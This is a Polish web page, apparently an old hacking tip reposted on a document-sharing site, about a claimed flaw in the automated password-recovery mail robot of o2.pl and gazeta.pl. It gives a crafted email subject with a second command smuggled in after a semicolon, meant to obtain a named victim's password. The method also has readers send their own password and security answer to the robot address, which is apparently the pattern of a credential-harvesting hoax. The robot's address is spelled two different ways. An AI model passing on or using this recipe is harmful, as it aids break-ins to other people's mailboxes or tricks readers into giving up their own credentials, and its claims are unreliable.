Dziura w zabezpieczeniach skrzynek pocztowych
----------------------------------------------
Często się zdarza, że ktoś zapomni hasło do swojej skrzynki internetowej. Dla "zapominalskich" istnieje możliwość prawie w każdym serwisie kont e-mail możliwość odzyskania swojego hasła (lub założenia nowego). Służy ku temu pytanie pomocnicze ("Jak miał na imię piesek twojej babci?" albo "Co widzisz za oknem?"
to na interii.pl :)))))))) Często wykorzystywana jest informacja o dniu urodzin, kodzie pocztowym, telefonie itp.
Odzyskiwanie hasła odbywa się we wszystkich bezpłatnych serwisach automatycznie. Wypełniasz formularz potrzebnymi danymi
i dostajesz na e-mail swoje hasło, albo dostajesz możliwość zmienić swoje hasło na nowe. Wydaje się, że to jest bezpieczna droga odzyskiwania, ale W niektórych serwisach (poczta.o2.pl, gazeta.pl) istnieje dziura (możliwe, że już naprawiona, choć dla jej naprawy potrzebne by było skasować możliwość odzyskiwania hasła), która umożliwia dowolnemu użytkownikowi, który posiada konto pocztowe na tym samym serwisie i pamięta wszystkie swoje dane (login, hasło, odpowiedź na pytanie pomocnicze) otrzymać hasło dowolnego konta pocztowego.
Sposób działania.
- dane, które wpisujemy w formularzu odzyskiwania hasła, są przetwarzane automatycznie przez program-"sekretarkę", do którego istnieje dostęp przez e-mail:
pass_repair@o2.pl
- możemy odzyskać swoje hasło, wysyłając na powyższy adres maila następującej treści:
--------
To: pass_repaire@o2.pl
From: jakieskonto@o2.pl
Subject: get_passw&login:mojlogin&answer:odpowiedznapytanie&send
W tekście wiadomości nie piszemy nic.
---------
Natomiast dziura polega na tym, ze jeśli po średniku (;) napiszemy prawidłowe dane (hasło i odpowiedź) konta, z którego wysyłamy zapytanie o stracone hasło (pole "From"), to robot automatycznie wyśle nam hasło żądanego konta nawet bez podania odpowiedzi na pomocnicze pytanie ?
Przykład :)
Twój adres e-mail: haker22@o2.pl, twoje hasło: qwerty, odpowiedź: "ser z dżemem"
Adres ofiary: ofiara23@o2.pl (hasła nie znamy i odpowiedzi też
przecież poto chcemy się włamać)
Mail będzie wyglądał tak oto:
To: pass_repaire@o2.pl
From: haker22@o2.pl
Sub: get_passw&login:ofiara23&answer:none&send;get_passw&login:haker22&answer:ser%20z%20dżemem&send
Taka sekretarka" działa nie zbyt szybko, ponieważ robot obsługuje najpierw zapytania płynące z formularza na stronie www, a dopiero później wszystkie inne. Czasem na hasło trzeba poczekać parę dni ?
Wyszukiwarka
Podobne podstrony:
PL 11 4 2 8 Lab Researching Password Recovery Procedureso2 pl new2008 01 04 PL procedura odzyskiwania oryginalnego oprogramowaniaPOCZTA FMSensacyjna porażka naukowców Onet pl Wiadomości 05 03 2010INSTRUKCJA OBSŁUGI CYFROWY ODBIORNIK RADIOWY FM RDS DAB PLUS ELTRA OLGA MODEL 26 DAB PLINSTRUKCJA OBSŁUGI NADAJNIK FM NOKIA CA 300 PLNastolatka z pełną buzią xD Onet pl Bloghttp poczta interia pl poczta attachment fid=1&mid=5&mpid=3&f=Curie1Kultura bez lichwy Biznes w Onet plISO FM leg PL�2012new templatePortal Onet pl Tygodnik Polityka indexNastolatka z pełną buzią xD Onet pl Blog3Jak złamać hasło na poczte działa rewelacyjnie(na 100 ) sposób na hasla password hack haker hasloinne poczta lotus notes 8 5 pl niezbednik uzytkownika marek zawadzki ebookNastolatka z pełną buzią xD Onet pl Blog2Konfiguracja Outlook z poczta Wp plwięcej podobnych podstron